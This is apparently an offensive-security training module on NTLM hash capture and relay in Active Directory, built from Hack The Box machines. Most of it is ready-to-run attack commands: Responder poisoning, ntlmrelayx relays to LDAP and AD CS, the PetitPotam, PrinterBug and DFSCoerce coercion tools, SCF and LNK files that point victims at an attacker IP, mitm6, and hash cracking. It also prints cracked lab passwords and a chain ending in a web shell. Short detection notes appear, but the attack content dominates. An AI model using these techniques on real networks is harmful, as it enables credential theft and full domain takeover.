Back to All Modules

NTLM Theft and Relay

#Overview

NTLM theft captures Windows authentication hashes by forcing a victim machine to authenticate to an attacker-controlled server. Relay attacks forward captured NTLM authentication to other services, impersonating the victim. Combined with coercion techniques (PetitPotam, PrinterBug, DFSCoerce) that force privileged accounts to authenticate, an attacker can escalate from an unprivileged position to full domain compromise in a single relay chain. Understanding when relaying works (and when it does not, due to SMB signing or EPA) is critical.

#Prerequisites

  • Network position where LLMNR/NBT-NS/mDNS multicast traffic is reachable (same subnet for poisoning)
  • A writable SMB share or web server reachable by the victim for SCF/LNK attacks
  • ntlmrelayx for relay attacks; Responder for hash capture
  • Target services that do not require SMB signing (check with netexec)

#Detection & Enumeration

#SMB Signing Check

# Check if SMB signing is required (blocks NTLM relay to SMB)
netexec smb 10.10.11.231
# Look for: signing:True (required) vs signing:False (vulnerable to relay)
# Forest: signing:True -> relay to SMB won't work, must relay to LDAP/HTTP
# Flight: signing:True -> same constraint
# Rebound: signing:True -> same constraint
BASH

#Identify Writable SMB Shares

# Check share permissions for write access
smbmap -H 10.10.10.100 -u user -p pass
# Look for WRITE or READ,WRITE permissions
crackmapexec smb 10.10.10.100 -u user -p pass --shares
BASH

#Exploitation / Execution

#Responder: NTLM Hash Capture

# Basic Responder with verbose output on tun0 interface
# -I: interface to listen on
# -v: verbose mode
responder -I tun0 -v

# Responder with specific protocols
# Disabling SMB and HTTP servers to avoid conflicting with ntlmrelayx
responder -I tun0 -wdPv
# -w: start WPAD rogue server (forces browsers to proxy through attacker)
# -d: enable answers for DHCP broadcast requests
# -P: enable proxy auth NTLMSSP

# Capture hash via UNC path trigger
# From MSSQL: EXEC MASTER.sys.xp_dirtree '\\10.10.14.14\test', 1, 1
# From LFI: http://school.flight.htb/index.php?view=//10.10.14.59/htb
BASH

#ntlmrelayx: NTLM Relay

# Relay captured NTLM auth to LDAP (commonly not signed)
# --no-smb-server: disable SMB server to avoid conflicts with Responder
ntlmrelayx.py -t ldap://<DC_IP> --no-smb-server --escalate-user <username>

# Relay to LDAPS (if channel binding not enforced)
ntlmrelayx.py -t ldaps://<DC_IP> --no-smb-server

# Relay with SOCKS proxy for session hijack
# -socks: start SOCKS proxy for each relayed session
ntlmrelayx.py -t ldap://10.10.10.161 --no-smb-server -socks

# Relay to HTTP (e.g., AD CS web enrollment for ESC8)
ntlmrelayx.py -t http://<CA_SERVER>/certsrv/certfnsh.asp --no-smb-server

# LDAP relay for RBCD (grant delegation rights)
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldap://dc01.domain.local --delegate-access

# LDAP relay with auto machine account creation (for RBCD attack path)
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldap://dc01.domain.local --delegate-access --add-computer

# ADCS certificate enrollment relay
impacket-ntlmrelayx -tf targets.txt -smb2support -t adcs://10.10.10.10

# SOCKS mode with proxychains usage
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
# Then use via proxychains: proxychains4 impacket-smbclient ...

# IPv6 relay (requires mitm6 for DHCPv6 spoofing)
impacket-ntlmrelayx -tf targets.txt -smb2support -6
# The -6 flag enables IPv6 listener for relayed connections from mitm6
BASH

#SCF File Attack (Icon Path)

# Create SCF file with icon path pointing to attacker IP
cat > shortcut.scf << 'EOF'
[Shell]
Command=2
IconFile=\\10.10.14.10\share\icon.ico
[Taskbar]
Command=ToggleDesktop
EOF

# Place SCF file on a writable SMB share
smbclient //flight.htb/Shared -U 'S.Moon%S@Ss!K@*t13'
smb: \> put shortcut.scf

# Start Responder to capture NTLMv2 hash when a user browses the share
responder -I tun0 -v
BASH

#Malicious .lnk Files

# Generate .lnk files with ntl_theft
git clone https://github.com/Greenwolf/ntlm_theft
cd ntlm_theft
python3 ntlm_theft.py --generate all --server 10.10.14.67 --filename htb

# Upload files to writable share
# Focus on (BROWSE TO FOLDER) trigger type files for minimal user interaction
impacket-smbclient s.moon:'S@Ss!K@*t13'@flight.htb
use Shared
put "desktop.ini"
put "target.lnk"

# Start Responder to capture when victim browses folder
responder -I tun0 -v
BASH

#PetitPotam Coercion

# Force a server to authenticate to attacker via MS-EFSRPC
# Target: any Windows server; Attacker: Responder or ntlmrelayx
python3 PetitPotam.py -d <domain> -u <user> -p <pass> <attacker_ip> <target_ip>

# With ntlmrelayx to capture and relay
ntlmrelayx.py -t ldap://<DC_IP> --no-smb-server &
python3 PetitPotam.py 10.10.14.10 10.10.10.10  # target DC
BASH

#PrinterBug Coercion

# Force a print server to authenticate via MS-RPRN
# Target: typically a Domain Controller
python3 printerbug.py <domain>/<user>:<pass>@<target_ip> <attacker_ip>

# Combined with ntlmrelayx
ntlmrelayx.py -t ldap://<DC_IP> --no-smb-server &
python3 printerbug.py domain/user:pass@10.10.10.10 10.10.14.10
BASH

#DFSCoerce

# DFS coercion — abuse MS-DFSNM to force authentication
python3 dfscoerce.py -d <domain> -u <user> -p <pass> <attacker_ip> <target_ip>
BASH

#ShadowCoerce

# ShadowCoerce — NTLM coercion via MS-EFSRPC \PIPE\svchost
# Different from PetitPotam — works on newer Windows Server versions
python3 ShadowCoerce.py -d domain.local -u user -p pass -t 10.10.10.10 10.10.14.5
# Uses EfsRpcOpenFileRaw through a different pipe than PetitPotam
BASH

#SpoolSample.exe

:: SpoolSample.exe — Original C# PrinterBug implementation
SpoolSample.exe <target> <attacker_ip>
CMD

#Cross-Session Relay (on Same Machine)

When you have a foothold on a machine with another logged-in user, you can relay within the same host:

# KrbRelay — cross-session relay on Windows Server 2019
# -ntlm: use NTLM authentication (not Kerberos)
# -session: target user's session ID
# -clsid: CLSID for RPC service with correct permissions
./RunasCs.exe oorend '1GR8t@$$4u' -l 9 "c:\users\winrm_svc\documents\KrbRelay.exe -ntlm -session 1 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10246"

# RunasCs enables running as a different user to interact with other sessions
# Run qwinsta first to see which sessions have active users
BASH

#IPv6 Attacks (mitm6 + ntlmrelayx)

# mitm6: IPv6 DNS takeover to redirect authentication
# Start ntlmrelayx targeting LDAP
ntlmrelayx.py -6 -t ldap://<DC_IP> --no-smb-server -wh attacker-wpad.example.com &
mitm6 -d <domain>

# This forces clients on the subnet to authenticate via IPv6 to the attacker
# WPAD is spoofed, causing browsers and services to proxy through the attacker
BASH

#Cracking Captured Hashes

# NTLMv2 captured by Responder -> john/hashcat
john hash --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
# Mode 5600: NetNTLMv2

# TGS from ntlmrelayx SOCKS -> no cracking needed (session hijack)
# Use proxychains with the SOCKS port to interact with relayed sessions
BASH

#Real-World Chain (Flight HTB)

# 1. LFI on web app -> UNC path inclusion
responder -I tun0 -v
http://school.flight.htb/index.php?view=//10.10.14.59/htb
# Captured svc_apache hash -> cracked to S@Ss!K@*t13

# 2. Password spray svc_apache password -> found S.Moon with same password
netexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13'
# [+] S.Moon:S@Ss!K@*t13  with WRITE access to Shared

# 3. Upload ntlm_theft files to writable share -> capture c.bum hash
python3 ntlm_theft.py --generate all --server 10.10.14.67 --filename htb
# Crack c.bum hash -> Tikkycoll_431012284
# WRITE access to Web share -> PHP shell -> sliver C2
BASH

#When Relaying Works and When It Does Not

Target ServiceRelay RequirementTypical Status
SMBSMB signing disabledOften enabled on DCs (signing:True)
LDAPChannel binding not enforcedOften relayable; used for RBCD/DCSync escalation
LDAPSChannel binding not enforcedSometimes relayable
HTTP (AD CS)No EPAESC8 attack path
MSSQLWindows auth modeIf configured for Windows auth
IMAP/POP3NTLM auth enabledRare in AD environments

SMB Signing status is key:

  • signing:True (enforced): Relay to SMB is blocked. Relay to LDAP is still possible.
  • signing:False: Relay to any service is possible including SMB.
# Quick check
netexec smb 10.10.10.10
# Look for "(signing:True)" or "(signing:False)" in output
BASH

#Common Pitfalls

  • Relay fails with signing:True: The target enforces SMB signing. Switch to LDAP relay (commonly not signed).
  • Responder captures no hashes: You may not be on the same broadcast domain. Use SCF/LNK files on writable shares instead of poisoning.
  • ntlmrelayx session dies: The relayed session has a short lifetime. Use SOCKS mode and proxychains, or act quickly.
  • Channel binding blocks LDAP relay: The DC enforces LDAP channel binding. Relaying is not possible on this target.
  • Impacket DNS resolution: When -dc-ip is not specified, impacket attempts DNS resolution which fails in split-brain DNS. Always use -dc-ip when possible.
  • SOCKS session timeout: ntlmrelayx -socks sessions expire when the relayed connection times out (typically minutes). Act quickly after obtaining sessions.

#OPSEC Considerations

  • Responder's LLMNR and NBT-NS poisoning is active on the network and detectable by NIDS/NIPS
  • SMB requests from unexpected hosts to writable shares may trigger alerts
  • PetitPotam/PrinterBug generate MS-EFSRPC/MS-RPRN events which are monitored by EDR
  • Cracking NTLMv2 hashes is offline and undetectable, but the initial capture is very visible
  • mitm6 is extremely noisy on the network and may disrupt IPv6 services
  • NTLM relay auth → Event ID 4624 Logon Type 3 (network logon) — distinct from interactive
  • Responder WPAD spoofing → Detected by Microsoft Defender for Identity (MDI) with high confidence
  • ntlmrelayx traffic patterns → Detectable by Zeek/Suricata with custom signatures
  • SMB signing enforcement → Check with: nxc smb <target> --signing

#Post-Exploitation Value

  • Captured NTLM hashes provide credential material for cracking
  • Relayed NTLM to LDAP can create/ escalate accounts, grant DCSync rights, or perform RBCD
  • Relayed NTLM to AD CS HTTP endpoint (ESC8) yields certificates for Domain Admin
  • Even low-privilege captured hashes can be used for further enumeration and password spraying

#Cross-References

#Tool References

ToolLink
Responderhttps://github.com/lgandx/Responder
ntlmrelayx (Impacket)https://github.com/fortra/impacket
ntl_thefthttps://github.com/Greenwolf/ntlm_theft
PetitPotamhttps://github.com/topotam/PetitPotam
PrinterBughttps://github.com/dirkjanm/krbrelayx
DFSCoercehttps://github.com/Wh04m1001/DFSCoerce
KrbRelayhttps://github.com/cube0x0/KrbRelay
mitm6https://github.com/dirkjanm/mitm6

#Source Machines

  • Flight (Hard) — LFI via UNC -> svc_apache hash -> spray -> S.Moon -> ntlm_theft on Shared -> c.bum hash -> Web upload shell -> DCSync
  • Fluffy (Easy) — CVE-2025-24071 ZIP extraction -> NTLM capture of p.agila -> cracked to prometheusx-303
  • Escape (Medium) — MSSQL xp_dirtree to attacker UNC -> Responder captures sql_svc hash -> cracked to REGGIE1234ronnie
  • Rebound (Insane) — Cross-session relay via KrbRelay from winrm_svc session to tbrady's session -> NTLMv2 hash cracked -> gMSA password -> RBCD -> DCSync